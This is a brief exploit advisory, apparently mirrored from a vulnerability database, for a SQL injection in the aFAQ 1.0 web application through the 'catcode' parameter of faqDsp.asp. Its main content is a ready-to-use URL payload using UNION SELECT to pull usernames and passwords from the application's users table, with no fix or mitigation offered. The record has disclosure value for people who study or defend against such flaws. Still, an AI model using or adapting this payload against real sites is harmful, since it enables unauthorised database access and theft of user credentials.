Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15539
HistoryDec 31, 2006 - 12:00 a.m.

aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability

2006-12-3100:00:00
vulners.com
22

Title : aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : http://www.alanward.net

$$ : Free


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//faqDsp.asp?catcode=[SQL]

Example:

//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

Im not Hacker!